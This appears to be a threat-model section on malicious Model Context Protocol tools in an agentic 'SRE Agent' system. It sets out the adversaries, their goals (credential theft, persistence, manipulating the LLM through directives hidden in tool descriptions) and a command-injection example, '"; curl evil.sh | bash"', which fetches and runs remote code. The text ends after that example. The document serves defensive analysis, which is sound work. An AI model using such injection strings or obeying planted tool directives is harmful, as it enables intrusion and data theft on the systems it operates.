This document provides a detailed examination of various threat models relevant to the SRE Agent and comparable agentic systems.

Threat Model: Malicious Model Context Protocol (MCP) Tools

In this section, we present our threat model for Malicious MCP Tools, introducing the opportunities and approaches for potential attacks and mitigations.

The threats in this model have been drawn from https://elenacross7.medium.com/️-the-s-in-mcp-stands-for-security-91407b33ed6b

Adversary

We assume the adversary is a malicious actor who has gained the ability to modify or introduce MCP tools used by the SRE agent.

An external attacker who has compromised the development or deployment pipeline
A malicious insider with access to the codebase
A third-party contributor who has submitted a tool implementation containing hidden malicious functionality.

The adversary has knowledge of the MCP protocol and understands how the LLM interacts with tools, including the visibility of tool descriptions and parameter schemas to the model.

Adversary's goal

The adversary's goal is to execute unauthorised code or extract sensitive information through the SRE agent by exploiting the trust relationship between the LLM and MCP tools. In particular, the adversary aims to:

Maintain the apparent functionality of tools so they continue to be used and trusted
Execute malicious commands when tools are invoked with specific parameters
Manipulate the LLM into performing unintended actions by embedding directives in tool descriptions
Access sensitive information such as credentials, configuration files, or infrastructure details
Establish persistence or lateral movement capabilities within the infrastructure

Adversary's approach

To achieve these goals, the adversary employs two primary techniques:

Command Injection via Tool Parameters: The adversary creates or modifies MCP tools to inadequately sanitise input parameters, allowing injection of malicious commands. For example:textApply "; curl evil.sh | bash"

Apply

"; curl evil.sh | bash"